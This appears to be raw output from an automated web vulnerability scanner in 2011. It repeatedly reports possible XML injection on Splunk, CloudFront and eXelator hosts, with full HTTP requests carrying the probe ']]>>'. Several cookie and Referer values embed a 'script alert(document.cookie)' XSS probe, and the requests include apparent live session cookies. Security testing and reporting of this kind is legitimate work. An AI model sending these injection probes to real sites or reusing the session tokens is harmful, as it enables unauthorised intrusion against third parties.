HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:07 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets]]>>/v5/homepage/homepage.hero.js HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:48:19 GMT Server: lighttpd/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5]]>>/homepage/homepage.hero.js HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:22 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage]]>>/homepage.hero.js HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:24 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /web_assets/v5/homepage/homepage.hero.js]]>> HTTP/1.1 Host: coverall.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942985.2.2.utmcsr=splunkbase.splunk.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942985.2; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942985; __kts=1296942984820,http%3A%2F%2Fwww.splunk.com%2F,http%3A%2F%2Fsplunkbase.splunk.com%2F%3F1ffc5%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E46cc332d1dc%3D1; __ktt=e7f-7c3a-23d7-b39612df7d36e75;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Connection: close Date: Sat, 05 Feb 2011 22:48:26 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/css/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/css/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css]]>>/frontpage.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css/frontpage.css]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/css/main.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/css/main.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css]]>>/main.css?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/css/main.css]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/favicon16.ico HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/favicon16.ico HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/favicon16.ico]]>> HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/js/min/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/js/min/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js]]>>/min/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min]]>>/frontpage.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min/frontpage.js]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version]]>>/7.01/js/min/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01]]>>/js/min/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js]]>>/min/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min]]>>/main.js?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /version/7.01/js/min/main.js]]>>?redownloadToken=7.01 HTTP/1.1 Host: d3g75t6gdfoqd0.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load]]>>/ HTTP/1.1 Host: load.exelator.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSzNDQ0Mja1rASTuFDw%253D; TFF=eJydlktywyAMhu%252BSE%252BgBFpCNj9FtFll0prt2l8ndSxIbXASO3IUHhvk%252F9LAk%252B5I8pNt3QkonBDfDBHOMkU7nS6J0%252B0x4zo%252BLPi%252Fw3E7xfFd6fOi50VN%252BWk4KZiPyCq5RyqKM%252Bu7rx%252FXr8nNt714Jpl4YAjMA9sKW6kzean0btqxBYMNJwWxEXgWMdz98IudHMYQaQ3jpXdVT8Cyx8SloS5rEGFnoPyQDiXgrKQW0EfnMeatXaxGHbtGHUPWho1ceBW0nbIs%252BtEU%252FJJ7vFGB2Ydq3RNrUwhmRfAgwaBecBglAOJawRX80YRk7kjAUznVCXc%252FqrAixo1eeRW2nzK8XZiMejczGu59NwjvtVWakK2SsI4DLCHBmbmMxkoAfznFuSa4kAUHbz2Pwr0nGtlCtzjIObbakFNBG5DP2B7wqH8LdePAdOYxHkVzJ3eQrcBkrHrtVXxq%252Fm%252FqV6wZpJpWvQ5Ir2Q1yBErhzKbWMTX4%252BZGql45%252BmEZqObfhdtP4lhxmQ5Fcyd00tqAUzkbcfwGzsZTz; BFF=eJztlM1OwzAQhN8lT%252BCfOI7dS1OqikhNgNat4IR65MwR%252Bu6s3SRdu2uJoB65fjMeO%252FF6TrYU9uvTcmYLx1nZLY0xolh8WF7WegGCtEX31LvH7dv7sd23rlicrKpzayoDa9TAEYq8EgnGc81QhFaAywtGxCc0K7cUtZLaDCf0ggwcgdEpmdBaJULbH8kI4ISTjNh1r2QEcMLJ4Xu1IAQy%252B2HbkdnACScZ0ayJbBk4dorxQqLtdCRFMRpdo8NjUl%252Bv3CE0xiRXFkvRDjXa4ZDZ4ZDzSiyAeS9YCZ%252F8zbhXq0EdZ%252FGqYkFMQrpGTwqCMLvrZhtGurxgM8yux4h440vvKCPgxNj2G8oIGJFxxo3QTPE4IbwSJpiKcRitBI9zTsWEl0L4%252FexS%252FvAs8n7Jq5yQHNT%252Ffiqoee5vN5aBJwFgJAPW9Mmb1e7GH1plhwP49GDS6EHZRIq%252BzuxmQme6CbXKN2G29%252BbX3PxWo0osur%252Ffl9j8zrpzRd25j%252F5aPvmOydRJpjwyVfFfDPftgfnP%252FvwDMTU0HA%253D%253D; 